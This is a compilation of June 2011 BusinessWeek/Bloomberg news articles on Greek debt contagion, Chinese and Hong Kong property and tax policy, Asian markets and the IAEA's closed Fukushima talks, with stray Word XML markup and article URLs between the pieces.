Credit Agricole SA may have their credit ratings cut by Moody's Investors Service because of their investments in Greece, the ratings company said on June 15. German banks could also be at risk from contagion, Fitch Ratings said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56, said on June 17 she would work with the ECB to get Greek creditors to participate in a rescue on a voluntary basis, seeking to appease ECB President Jean-Claude Trichet, 68, who contends that any compulsory move to involve bondholders would trigger a default. The ECB doesn't accept defaulted debt as collateral when providing the cash banks in Greece, Portugal and elsewhere depend on after being shut out of credit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June 18 in Berlin that policy makers must make sure the Greek crisis doesn't infect the rest of the euro region and spark a new global financial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lived through Lehman Brothers," she told a meeting of activists from her ruling Christian Democrat party. "I don't want another such threat to emanate from Europe. We wouldn't be able to control an insolvency."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that euro-area banks holding Greek government bonds will be saddled with losses increased after S&amp;P slapped Greece with the world's lowest sovereign credit rating June 13.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should "absolutely not default," Josef Ackermann, CEO of Frankfurt- based Deutsche Bank AG, said in a June 17 interview in St. Petersburg, Russia. The EU needs to provide more aid to the country if required,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Ackermann, 63, told CNBC the same day that the risk of a Greek default lies in "what is going to happen in other markets and what is going to happen in other countries," concluding that "no one has a clear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Lehman Legacy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Ackermann knows about contagion firsthand. He told an audience in Frankfurt's Congress Center in September 2007 that risks from the U.S. subprime mortgage market were "manageable." The crisis spread to other markets soon after, leading to more than $2 trillion of losses and writedowns worldwide and the collapse of Lehman Brothers a year later.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worst consequence of any Greek sovereign default for German and other European banks would be a sharp increase in general capital market and creditor risk aversion at a time when many banks are still in rehabilitation mode," Michael Dawson- Kropf, a Frankfurt-based Fitch analyst, said in a May 25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banks are more at risk from a "disorderly" market reaction to Greek debt restructuring than any losses on their holdings of the country's bonds, James Longsdon, a managing director at Fitch, said in an interview in Seoul today. Greek government debt held by European banks isn't large enough to trigger an "insolvency event" at the lenders,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Raising Capital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banks have raised 59 billion euros since stress tests last July, according to calculations by Huw van Steenis, an analyst at Morgan Stanley.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Independent Credit View, a Swiss ratings company that predicted Ireland's banks would need another bailout last year, said in a stress-test study earlier this month that 33 of Europe's biggest banks would need $347 billion of additional capital by the end of 2012 to boost their tangible common equity to 10 percent from 9.1 percent at the end of 2010. The group chose that threshold because it's about 30 percent above the average ratio for the past 10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S&amp;P stress test published in March estimated European banks would need as much as 250 billion euros in fresh capital if faced with a "sharp" increase in yields and a "severe" economic decline.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lenders had the highest overall foreign claims on Greek borrowers of $56.7 billion, including $15 billion in public debt, at the end of 2010, data from the BIS showed. French banks had $589.8 billion of loans tied to Ireland, Italy, Portugal and Spain.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Tops Lenders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lenders were the biggest foreign owners of Greek government debt with $22.7 billion in holdings last year and had the second-most overall claims, the BIS said. Their claims on Ireland, Italy, Portugal and Spain amounted to $498.8 billion. The two countries hold more than 60 percent of all foreign claims on Greece, according to BIS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in the two countries have lowered their risk tied to Greek public debt by 25 percent to $37.6 billion from the end of March 2010 through December. The main reason for the decline is companies letting bonds or loans expire without renewing them, according to Lutz Roehmeyer, who helps manage about $17 billion at Landesbank Berlin Investment in Berlin. Lenders also have been writing down the value of Greek holdings, setting aside provisions and moving assets into so-called bad banks, as well as selling shares to boost reserves,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Too Big to Shoulder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 hit from Greece is manageable because investors have had time to prepare, but contagion to other countries is the big risk," Roehmeyer said. "If the crisis spreads to Ireland, Portugal and Spain, it would be too big for the banks to shoulder."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impact of credit-default swaps, which led to the near- collapse of American International Group Inc. in 2008, may be limited in a Greek default. Credit-default swaps on Greek sovereign debt cover a net notional $5 billion, according to the Depository Trust &amp; Clearing Corp., which runs a central registry that captures most trades. That's only 1 percent of the government's $482 billion of bonds and loans outstanding, according to data compiled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Swaps on Italian sovereign debt cover a net notional $25 billion, the most of any country or company in the world, according to DTCC. That compares with $2.3 trillion of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banks have already had to write down the value of their Greek bond holdings as they have fallen in the market, said Florian Esterer, who helps manage more than $60 billion at Swisscanto Asset Management AG in Zurich.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problem that we have is less to do with the loss of Greece as such and more to do with the question of what would happen to other countries," Esterer said. "The risk of contagion is probably exactly the same as a year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Adam Ewing in Stockholm, Boris Groendahl in Vienna, Jana Randow in Frankfurt, Charles Penty in Madrid, John Glover in London and Seonjin Cha in Seoul. Editors: Frank Connelly, Robert Friedman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Aaron Kirchfeld in Frankfurt at akirchfeld@bloomberg.net; Elena Logutenkova in Zurich at elogutenkova@bloomberg.net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Frank Connelly at fconnelly@bloomberg.net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Bank for International Settlements Bailout Banking Industry Online Banking Swiss Banking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07:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/greek-default-spells-havoc-for-banks-a-year-after-bailout.html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Existing Housing Market Cools in May Amid Measures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10:18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Beijing May New Home Prices Rise 2.1% From Year Ago, Agency Says China Stocks Fall, Capping Second Weekly Loss, on Policy Concern Asia Housing Boom Stalls as Tightening Puts Brake on Prices Consumer Spending Fades in China Economy After Б─≤Peak DaysБ─(tm) China Falls Short on Bond Sale for Second Time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property index in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China's effort to cool home prices is damping the market for existing homes, with prices in May falling from the previous month in 23 of 70 cities measured.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more than the 16 cities that posted declines in April, data from the National Bureau of Statistics posted to its website June 18 showed. Existing home prices in Beijing fell 0.2 percent from April while those in Shanghai increased 0.2 percent. The price of new homes, typically sold by developers, rose last month in 67 of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in China and Hong Kong are stepping up property curbs amid concern prices are becoming unaffordable. China on June 14 ordered banks to hold more money as reserves for the sixth time in 2011 as it fights to contain inflation.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measures work better in the existing home market because the strict home purchase restrictions effectively restrain some purchasing power," Jeffrey Gao, a Shanghai-based analyst at Royal Bank of Scotland Plc, said in a phone interview. "Developers on the other hand are not in a rush to cut home prices as they watch the direction of government policies."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measure of property stocks on the Shanghai Composite Index rose 0.9 percent as of 9:58 a.m., posting the only gain among the five industry groups on the benchmark gauge.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slowing home price growth in the market for existing homes may force more property agencies out of business, said Gao. Midland Realty Ltd. said it will close all of its branches that broker existing homes sales and rentals in Shanghai, because it "isn't optimistic" about the market in the city, China Business News said on May 9, citing Ding Wei, a company official.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Slower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 increases for new homes slowed last month in big cities such as the capital of Beijing, the statistics bureau said. Efforts to rein in property prices have been focused on the nation's largest urban areas. A total of 29 cities posted increases exceeding 5 percent, down from 33 cities in April, according to the bureau's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New-home prices in Beijing rose 2.1 percent in May from a year earlier, while those in Shanghai climbed 1.4 percent, the statistics bureau said. The biggest gains last month were in smaller cities including Urumqi, Mudanjiang, Lanzhou and Qinhuangdao, which all posted increases of at least 7.7 percent, according to the data. Prices in northeastern China's Dandong rose 9.7 percent in May, the most among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with the previous month, new home prices fell in nine cities in May, the same number as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may cut home prices in the second half of the year after facing a drain on cash flow, Gao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Outlook Cut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developers' outlook was cut to "negative" from "stable" by Standard &amp; Poor's on June 15 on concern tighter credit and further government curbs may lead to rating downgrades in the next year. Property sales may start to slow as the government's policy "starts to bite," leading to price cuts that may drive home prices 10 percent lower in the next 12 months, the credit rating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developers such as China Vanke Co. and China Overseas Land &amp; Investment Ltd. started to cut prices in some Chinese cities, and more may follow suit in the second half of this year, according to Credit Suisse Group AG.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are still watching to see how strict the government's property measures will be before cutting prices," said Shen Jian-guang, a Hong Kong- based economist at Mizuho Securities Asia Ltd., in a phone interview. "The slowdown of existing home prices is showing the government's home purchase restrictions are having some effect."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Kong's home prices are "quite frightening" as growing wealth in China fuels increases of 2 percent a month, the city's Chief Executive Donald Tsang said in an interview in Melbourne June 17. Savills Plc ranks Hong Kong as the world's most expensive place to buy an apartment.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--Bonnie Cao. Editors: Malcolm Scott,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Bonnie Cao in Shanghai at bcao4@bloomberg.net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Housing Market China's Media Market Intelligence China Real Estate Emerging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06:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/china-existing-housing-market-cools-in-may-amid-measures.html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H.K.'s Tsang Struggles to Meet Tax Vow as Singapore Threat Looms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10:05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Existing Housing Market Cools in May Amid Measures RoyaltyБ─(tm)s $20 Million Bill May Thwart Singapore Medical Ambition China Wealth Fuels Hong Kong Home Price Surges, Tsang Says Asia Housing Boom Stalls as Tightening Puts Brake on Prices Consumer Spending Fades in China Economy After Б─≤Peak DaysБ─(tm)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Sophie Leung and Daniel Petrie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Hong Kong Chief Executive Donald Tsang said "You got me on that," when challenged on his claim to have carried out all he pledged when he stood for office in 2007. The missing achievement: cutting corporate taxes.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 year left of his term, Tsang is running out of time to restore some of Hong Kong's edge against regional rivals including Singapore, which has slashed taxes in a bid to attract global companies to base their Asian operations there.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losing the advantage that used to be an astonishingly low tax rate," David O'Rear, chief economist of the Hong Kong General Chamber of Commerce, the city's largest business group, said in a phone interview. "We've seen others, including China and Taiwan and Macau, also lower their tax rates in competition with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narrowed the corporate tax rate gap with Hong Kong to 50 basis points last year from 10 percentage points in 1999, drawing investment that put the island's economy on course to overtake more-populous Hong Kong's this year, International Monetary Fund estimates show. Surging home prices and rising income inequality in Hong Kong have helped drive Tsang's approval rating to a record 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still trying to find the opportunity" to meet the tax cut promise, Tsang said in a Bloomberg Television interview in Melbourne aired today. "At the moment, the Hong Kong people feel we should not reduce corporate profits tax and while it was feasible and acceptable in 2007, it is not acceptable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Casinos, Exports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Singapore's gross domestic product surged 22.5 percent in the three months through March from the previous quarter, compared with Hong Kong's 2.8 percent expansion. As well as slashing taxes on company profits, Singapore has lifted a ban on casinos and boosted the financial and legal services industries to reduce reliance on exports.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is still the world's biggest market for initial public offerings. Russian and Mongolian resource companies as well as European luxury brands have joined the city's $2.4 trillion stock market. The total value of Singapore-traded shares is $562 billion, data compiled by Bloomberg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cut taxes for companies by half a percentage point to 16.5 percent in 2008 to fend off the threat from Singapore. Tsang had pledged to bring the rate to 15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Cutting taxes now would be seen by the public as "a strong indication that Donald serves the interests of big business," said Joseph Cheng, a political-science professor at the City University of Hong Kong.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Kong's biggest income gap since it was returned to China is stoking protests against the government. Home prices that surged more than 70 percent since the start of 2009 are making property increasingly unaffordable, the Hong Kong Monetary Authority said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Tsang's approval rating has slumped to 23 percent, the lowest level since he began leading the city in 2005, according to a survey of 1,000 residents by the University of Hong Kong released June 14. The poll was carried out between June 1 and 8 and had a margin of error of plus or minus 4 percentage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"gap between rich and poor unfortunately is a byproduct of capitalism, particularly in a very successful global financial center like Hong Kong," Tsang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Michelle Yun in Hong Kong, Shraysi Tandon in Melbourne and Shamim Adam in Singapore, Fion Li in Hong Kong. Editors: Ben Richardson, Peter Hirschberg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Daniel Petrie in Sydney at dpetrie5@bloomberg.net Sophie Leung in Hong Kong at sleung59@bloomberg.net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Panckhurst in Hong Kong at ppanckhurst@bloomberg.net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Small Business Tax Deductions Business Taxes Business-to- Business Marketing The Singapore Exchange (SGX) Foreclosure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06:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/h-k-s-tsang-struggles-to-meet-tax-vow-as-singapore-threat-looms.html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Oil Decline on Greek Debt Concerns; Asian Stocks Rebound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10:52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Asian Stocks Rally; Australian Banks, Japan Automakers Advance Buffett-Backed BYD to Raise $219 Million in China Share Sale Beijing May New Home Prices Rise 2.1% From Year Ago, Agency Says Asian Stocks Post Longest Series of Weekly Losses Since 2004 Stocks Rise, Euro Strengthens on Greece Optimism; Oil Sinks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Shiyin Chen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euro slid, starting a third week of declines, while oil fell after European governments failed to agree on releasing a loan payment to spare Greece from default. Asian stocks rebounded from the lowest level in three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shared currency weakened 0.1 percent to $1.4288 and retreated for a fourth day against the yen as of 11:19 a.m. in Tokyo. Crude slipped 0.5 percent in New York, while silver futures rallied for a third day. Standard &amp; Poor's 500 Index futures retreated 0.1 percent. The MSCI Asia Pacific Index climbed 0.6 percent, following seven consecutive weekly losses.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left open whether Greece will get the full 12 billion euros ($17.1 billion) promised for July as they pushed for budget cuts by Prime Minister George Papandreou, whose government faces a confidence motion this week. Companies from Mazda Motor Corp. to Olympus Corp. are forecasting improving profits amid a sell-off that has dragged valuations for the MSCI Asia Pacific Index down to the lowest in almost three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Greece may have invented democracy, they certainly didn't invent stability so you could see further pressure on the euro," Nick Maroutsos, a portfolio manager and co-founder at Kapstream Capital, said in a Bloomberg Television interview from Sydney. "They need to start implementing stronger austerity measures but it's increasingly difficult given the social unrest and the political volatility that they're facing. It's a tough time in the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Confidence Motion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slid against 11 of its 16 most-actively traded counterparts and declined 0.1 percent to 114.35 yen. Papandreou kicked off a three-day debate yesterday on a confidence motion in his new government as he sought to secure parliamentary approval of a 78 billion-euro ($111 billion) package of budget cuts. Antonis Samaras, leader of New Democracy, the largest opposition party in Greece, repeated his call for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will decide on a new financing strategy for Greece by early July, the group said in a statement distributed to reporters in Luxembourg after talks. The Australian dollar lost 0.1 percent to $1.0604 while New Zealand's currency slid 0.3 percent to 81.05 U.S. cents.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things stand at the moment, we remain extremely underweight Europe," Stephen Davies, chief executive officer of Javelin Wealth Management Ltd., said in a Bloomberg Television interview in Singapore. "They'll come up with a short-term financing deal, which will answer the immediate funding issues. But as far as resolving the really long-term issues, as in how on earth Greece and the Greek people afford the interest payments and principal repayments without cratering the economy, that's going to be left for a later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Silver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for July delivery slipped 0.5 percent to $92.56 a barrel on the New York Mercantile Exchange, retreating for a second day. Futures fell 2 percent on June 17, capping a 6.3 percent weekly slump that was the steepest since the period ended May 6. Copper for three-month delivery lost 0.4 percent to $9,061 a metric ton on the London Metal Exchange, while silver futures rallied 0.7 percent to $36.01 an ounce.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climbed 0.3 percent on June 17, leaving the index little changed for the week. Two-year Treasuries yielded 0.39 percent, five basis points away from the lowest level this year. Home sales probably dropped in May to the lowest level this year, while orders placed with factories gained, economists said before reports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three shares climbed for every one that fell on MSCI's Asia Pacific Index, helping the gauge rebound from its longest weekly losing streak since 2004. Last week's declines drove the index's valuations to 14.2 times reported earnings, the lowest level since March 30.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added 0.6 percent and Australia's S&amp;P/ASX 200 Index rallied 0.5 percent. Mazda Motor jumped 3.7 percent after the automaker forecast it will return to profit in the year ending March 31. Olympus increased 2.7 percent after the optical-equipment maker forecast profit may more than double.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Rishaad Salamat and Susan Li in Hong Kong, Alexander Kwiatkowski, Wes Goodman and Kristine Aquino in Singapore, and Candice Zachariahs in Sydney. Editors: James Poole, Patrick Chu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Shiyin Chen in Singapore at schen37@bloomberg.net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Poole at jpoole4@bloomberg.net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The Big Business of Synthetic Highs Want to Live Cheaply? Head to Texas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Indian Stock Market Stock Research Oil and Gas Oil Speculation Offshore Oil Drilling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06:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/euro-oil-decline-on-greek-debt-concerns-asian-stocks-rebound.html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Fukushima Failures Kept Behind Closed Doors at UN Atomic Meeting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10:03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Failure Guru Probes Nuclear Crisis for Lessons Not Culprits EU Ministers Set to Clear Way for Greek Payment, Germany Says Merkel, Sarkozy Endorse Б─≤ViennaБ─(tm)-Style Rollover of Greek Debt MerkelБ─(tm)s Greek Bondholder Gambit Tested as Sarkozy Visits Papandreou Greek Б─≤OdysseyБ─(tm) Challenged by Confidence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Jonathan Tirone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United Nations nuclear agency's decision to hold talks about the Fukushima disaster behind closed doors this week ignores the "blindingly obvious" need for greater transparency, said a former official in the U.K. atomic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deserve openness from the industry and its regulators," Malcolm Grimston, a former information officer at the U.K.'s Atomic Energy Authority who is a London-based policy adviser at Chatham House, said in a June 17 interview. "It is blindingly obvious that greater transparency is needed."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crisis, which involved three reactor meltdowns, has been dogged by complaints that the plant operator and safety watchdogs haven't been transparent enough. The International Atomic Energy Agency's decision to shield the inquiry in Vienna from public view may backfire, analysts and scientists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handpicked participants include scientists, diplomats and people from the industry who will have a chance to question Japanese authorities about what went wrong in the worst nuclear disaster in 25 years. Journalists are excluded.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IAEA Director General Yukiya Amano called the ministerial meeting to learn lessons from the March 11 Fukushima accident and plot strategies to improve nuclear safety. While the agency, which operates under the slogan "Atoms for Peace," will give public access to delegates' opening statements, it's locking down panel discussions on Tokyo Electric Power Co's response to the accident and how nuclear safety can be improved after Fukushima.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 Response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has been criticized for a slow response to the accident and for publishing erroneous radiation data, while the government-run Nuclear and Industrial Safety Agency has been blamed for not ensuring the utility heeded warnings that a tsunami could overwhelm the plant's defenses.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meeting should have been set up to establish a technical baseline assuring that the agency will have all the facts it needs in the next six months for an independent assessment," said Mark Hibbs, a senior nuclear analyst at the Carnegie Endowment in Berlin, in a June 17 telephone interview. That probably won't happen as ministers attending the sessions get bogged down in "expressing generalities,"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Fukushima meetings will be closed "because of the highly detailed and technical nature of the drafting work," IAEA spokeswoman Gill Tudor said in a June 17 response to e- mailed questions. Summaries of the sessions will be made public,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FIA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News has filed a Freedom of Information Act request to the U.S. Nuclear Regulatory Commission seeking greater access to meetings where decisions about international nuclear safety are made.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ministers, nuclear regulators and power operators from the IAEA's 151 member states will meet for five days in the Austrian capital. Japan's Trade Minister Banri Kaieda as well as the U.S. Nuclear Regulatory Commission Chairman Gregory Jaczko and French Environment Minister Nathalie Kosciusko-Morizet are expected to attend.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reactors at the Fukushima plant had meltdowns after an earthquake and tsunami knocked out power and backup generators, crippling its cooling systems. The disaster displaced 50,000 households because of radiation leaks.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 in April raised the severity rating of the crisis to 7, the highest on an international scale and the same as the 1986 Chernobyl disaster.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Limited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"Technical organizations should be predictive and analytical," said former IAEA Director and U.S. nuclear engineer Robert Kelley in a June 17 telephone call. "What Fukushima showed is that the IAEA is primarily a political organization beholden to its members."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IAEA came under fire from member states in the weeks after the accident for not conducting independent analysis. Amano, a Japanese diplomat before taking over the agency in 2009, repeatedly said that the IAEA's role was limited to corroborating what Japanese authorities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coming out of Japan was backward looking and reactive," Grimston said. "There wasn't a sense of importance in keeping the public informed about future events."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Amano blamed Japanese authorities for being slow to share information, more transparency by the UN agency itself would have benefited people threatened by the accident, Kelley said. Releasing weather maps forecasting where radioactive elements would be deposited could have helped the Japanese public,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was slow in coming and the IAEA never seemed to be the go-to place when it finally did arrive," Kelley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Alex Devine, Aaron Sheldrick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Jonathan Tirone in Vienna at jtirone@bloomberg.net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Langan at plangan@bloomberg.net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Social Media Business Failures College of Business at Illinois Stock Options Options Trading India Innovation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06:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/fukushima-failures-kept-behind-closed-doors-at-un-atomic-meeting.html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Asian Stocks Gain; Japan Automakers, Australian Banks Advance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9:48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Asiana, Hon Hai, PetroChina, RHB: Asia Ex-Japan Stock Preview Japanese, Australian Stock Futures Rise on Greece, U.S. Economy Asian Stocks Post Longest Series of Weekly Losses Since 2004 Asian Stocks Cap Biggest Weekly Losing Streak in Seven Years Asia Housing Boom Stalls as Tightening Puts Brake on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Shani Raja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Asian stocks rose, snapping seven straight weeks of decline, as Australian banks, seen by some investors as a refuge amid Europe's sovereign debt crisis, advanced, and Japanese automakers rallied.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Commonwealth Bank of Australia, the nation's biggest lender, advanced 1.1 percent in Sydney. Westpac Banking Corp., the second largest, climbed 0.9 percent. Toyota Motor Corp., the world's largest carmaker, rose 0.6 percent as an index of U.S. leading indicators rebounded in May and after Citigroup Inc. raised its rating on Japan's auto sector to "neutral" from "bearish."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Asia Pacific Index added 0.4 percent to 130.11 as of 10:26 a.m. in Tokyo. The gauge lost 1.9 percent last week, completing its seventh straight weekly decline, the longest such run since 2004.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 may well construct a solution to Greece's debt woes, but the acid test will be whether or not the markets will be convinced that the solution is enduring rather than a band aid," said Tim Schroeders, who helps manage about $1 billion in global equities at Pengana Capital Ltd. in Melbourne.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rose 0.6 percent today. South Korea's Kospi Index gained 0.3 percent. Australia's S&amp;P/ASX 200 Index also climbed 0.3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governments failed to agree on releasing a loan payout to spare Greece from default, ramping up pressure on Prime Minister George Papandreou to first deliver budget cuts in the face of domestic opposition.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forcefully reminded the Greek government that by the end of this month they have to see to it that we are all convinced that all the commitments they made are fulfilled," Luxembourg Prime Minister Jean-Claude Juncker told reporters early today after chairing a seven-hour euro crisis meeting in Luxembourg.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Akiko Ikeda in Tokyo. Editors: Nick Gentle.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Shani Raja in Sydney at sraja4@bloomberg.net; Toshiro Hasegawa in Tokyo at thasegawa6@bloomberg.net.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Gentle at ngentle2@bloomberg.net.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Asian Automakers Japan Real Estate Australian Securities Exchange Japan's Economy Indian Stock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05:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/asian-stocks-gain-japan-automakers-australian-banks-advance.html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Europe Fails to Agree on Greek Payment, Pressing Papandreou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9:30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European Finance Chiefs Fail to Agree on Greek Aid Payment Europe May Withhold Half of Greek Payment to Pressure Athens EU Officials to Discuss Greek Plan That Skirts Default Risk EU Officials Set to Discuss Greek Plan That Skirts Default Risk Merkel Heeds ECB on Greece Saying Bondholder Role Voluntary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G. Neuger and Stephanie Bodoni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analyst's comment in eighth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European governments failed to agree on releasing a loan payment to spare Greece from default, ramping up pressure on Prime Minister George Papandreou to first deliver budget cuts in the face of domestic opposition.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eve of a confidence vote that may bring down Papandreou's government, euro-area finance ministers pushed Greece to pass laws to cut the deficit and sell state assets. They left open whether the country will get the full 12 billion euros ($17.1 billion) promised for July as part of last year's 110 billion-euro lifeline.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forcefully reminded the Greek government that by the end of this month they have to see to it that we are all convinced that all the commitments they made are fulfilled," Luxembourg Prime Minister Jean-Claude Juncker told reporters early today after chairing a euro-crisis meeting in Luxembourg.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Decisions on the next payout and a three-year follow-up package were put off until early July, prolonging Greece's fiscal agony and heightening the brinksmanship that has marked Europe's handling of the unprecedented debt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seven-hour finance ministers' meeting coincided with the start of a three-day Greek parliamentary debate in Athens over a confidence vote in a new cabinet at what Papandreou called a "critical crossroads." Papandreou has 155 seats in the 300-seat parliament.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Referendum Proposal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premier said he planned to hold a referendum later in the year on a constitutional revamp with the goal of tackling the root causes of Greece's debt and deficits that are "symptoms of the illness, not the cause."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travels to Brussels today to meet European Union President Herman Van Rompuy and European Commission President Jose Barroso. The confidence vote is scheduled for late tomorrow. The Greek crisis is set to dominate an EU summit in Brussels on June 23-24.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communication cacophony surrounding the policy response in our view is one of the reasons why the risk of contagion has remained and remains high," said Silvio Peruzzo, an economist at Royal Bank of Scotland Group Plc in London.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meeting was flanked by a teleconference of Group of Seven financial officials, two weeks after President Barack Obama singled out Germany as the key country responsible for preventing an "uncontrolled spiral of default" in Europe.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Prospects for a second aid package to stave off the euro area's first default had been enhanced by last week's decision by German Chancellor Angela Merkel to drop calls for a mandatory bond exchange that might lead credit rating companies to declare Greece unable to pay its bills.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Merkel's Concession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Merkel's June 17 concession gave a lift to stocks, bonds and the euro, spurring optimism that Europe would get ahead of the debt crisis that has exposed the weaknesses of the 17- country currency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German gesture buoyed Greek bonds, the 10-year yield of 16.94 percent remains almost 14 percentage points above the yield on German bonds, Europe's safest investment. Standard &amp; Poor's on June 13 cut Greece by three levels to CCC, branding it with the world's lowest debt grade.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Speculation that Greece will default has bled into other European markets, leading economists such as Nouriel Roubini to predict that the 17-nation euro, the high point of Europe's economic integration, won't survive in its current form.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rule out that Greece and Portugal, if they aren't able to recover competitiveness and growth and social tension further increases, may go back to the drachma and escudo on the wave of populist governments," Roubini, head of Roubini Global Economics LLC, told Italy's Il Sole 24 Ore on June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Spanish Spread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Ireland and Portugal followed Greece in obtaining emergency loans in the past year. Spain's finances came under the microscope last week, with investors pushing the extra yield on 10-year Spanish bonds to 261 basis points, the highest weekly close since January.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Investors Service said June 17 it may cut its Aa2 rating on Italy, with 2010 debt of 119 percent of gross domestic product, Europe's second highest after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needs to cover about 4 billion euros of bills maturing between July 15 and July 22, and faces about 3 billion euros of coupon payments in the month, according to Bloomberg calculations. A bigger test comes Aug. 20 when Greece must redeem 6.6 billion euros of maturing bonds.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Venizelos Commitment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Greek finance minister, Evangelos Venizelos, who was named in Papandreou's cabinet overhaul three days ago, came to Luxembourg with a "strong commitment" to the planned 78 billion euros in budget cuts that provoked street protests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 achieve our target thanks to the efforts of our people and thanks to the cooperation and the assistance of our partners," Venizelos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47 percent of 1,208 Greeks surveyed by Kapa Research SA for To Vima newspaper oppose the wage and spending cuts and higher taxes, and want early elections. Almost 35 percent said the package should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which as Europe's largest economy is the biggest guarantor of the aid packages to Greece, Ireland and Portugal, insists on an "ambitious" economic overhaul in Athens, Finance Minister Wolfgang Schaeuble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depends on Greece making the necessary decisions with a fundamental consensus of the political parties so that we can be confident that Greece will live up to its commitments," Schaeuble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Rollovers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key plank of a second aid package would be a pledge by banks, insurance companies and asset managers to buy new Greek bonds to replace maturing ones, instead of European governments stepping in with taxpayers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the ministers said the unlocking of fresh aid depends on working out "voluntary private sector involvement in the form of informal and voluntary rollovers of existing Greek debt at maturity."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Germany bowed to European Central Bank and French demands not to compel investors to buy new Greek bonds as old ones expire, the lines are blurry between a "voluntary" and "compulsory" rollover that would lead rating companies to declare Greece in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table are incentives for bondholders to maintain their exposure to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and Marcus Bensasson in Athens, and Jonathan Stearns, Mark Deen, Rebecca Christie, Rainer Buergin and Anabela Reis in Luxembourg, and Chiara Remondini in Milan. Editors: James Hertling, Jones Hayden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James G. Neuger in Luxembourg at jneuger@bloomberg.net; Stephanie Bodoni in Luxembourg at sbodoni@bloomberg.net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Marketing to Moms Eastern Europe Investments Online Payment Alternatives Business-to-Business Marketing Marketing to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05:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/europe-fails-to-agree-on-greek-payment-pressing-papandreou.html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Weakens Versus the Dollar, Yen Amid Greece Election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8:23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Greek Default Would Spell Б─≤HavocБ─(tm) for Banks a Year After Bailout Euro Strengthens as Germany Signals Compromise on Greek Crisis Euro Strengthens After Merkel Agrees to Greek Debt Compromise Euro Falls on Concern Europe Leaders Failing to Resolve Greece Euro Declines After Juncker Says Greece Progress Б─≤DifficultБ─(tm)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Kristine Aquino and Candice Zachariahs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euro fell against the dollar and yen as calls for new elections in Greece dimmed prospects for austerity measures and an aid package to prevent the currency union's first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17-nation currency declined versus 12 of its 16 most- traded peers before Greece resumes debate on a confidence motion for Prime Minister George Papandreou's government. The greenback strengthened against the currencies of Australia and New Zealand as investors bought safer assets.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inclination would be to sell into euro rallies," said Sean Callow, a senior currency strategist at Westpac Banking Corp. in Sydney. "We're not at all convinced that Greece has the political will to deliver everything that its lenders want from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fell to $1.4263 as of 8:59 a.m. in Tokyo from $1.4306 in New York on June 17. The shared currency declined to 114.29 yen from 114.52. The dollar traded at 80.16 yen from 80.05.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needs to secure parliamentary approval of a 78 billion-euro ($111 billion) package of budget cuts to ensure the payment of a fifth loan under last year's 110 billion-euro bailout. Antonis Samaras, leader of New Democracy, the largest opposition party in Greece, repeated his call for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kicked off a three-day debate yesterday on a confidence motion in his new government. He called for the vote last week, after opposition parties rejected pleas for national consensus and his handling of the crisis led to defections from his party.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Westpac's Callow recommended selling the euro on advances above $1.43, on concern the Greek government is "a little too precarious." The median forecast of 49 analysts polled by Bloomberg News is for the euro to fall to $1.40 by December.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will decide on a new financing strategy for Greece by early July, the group said in a statement distributed to reporters in Luxembourg after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Rocky Swift, Nicholas Reynolds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Kristine Aquino in Singapore at kaquino1@bloomberg.net Candice Zachariahs in Sydney at czachariahs2@bloomberg.net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Rocky Swift at rswift5@bloomberg.net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Economy and the Election Greece's Economy The Foreign Exchange Market 2012 Presidential Election The Chinese Yuan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04:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/euro-weakens-versus-the-dollar-yen-amid-greece-election-concern.html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European Finance Chiefs Fail to Agree on Greek Aid Payment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8:42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 May Withhold Half of Greek Payment to Pressure Athens Germany Presses Greece to Unite Behind Cuts to Escape Default EU Officials to Discuss Greek Plan That Skirts Default Risk EU Officials Set to Discuss Greek Plan That Skirts Default Risk Merkel Heeds ECB on Greece Saying Bondholder Role Voluntary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Jonathan Stearns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 from Reynders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Euro-area finance ministers reached no agreement on a scheduled 12 billion-euro ($17.1 billion) aid payment to Greece, Belgian Finance Minister Didier Reynders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tranche normally should be released in mid- July on the basis of a decision we take in early July," Reynders told reporters in Luxembourg after a euro group meeting that ended early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because "we are now starting the negotiations on the participation of the private sector on a voluntary basis" in a second bailout package for Greece and "we have to wait for the decision of the Greek parliament on the enactment of the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Patrick G.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Jonathan Stearns in Luxembourg at jstearns2@bloomberg.net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Infrastructure Financing European Energy 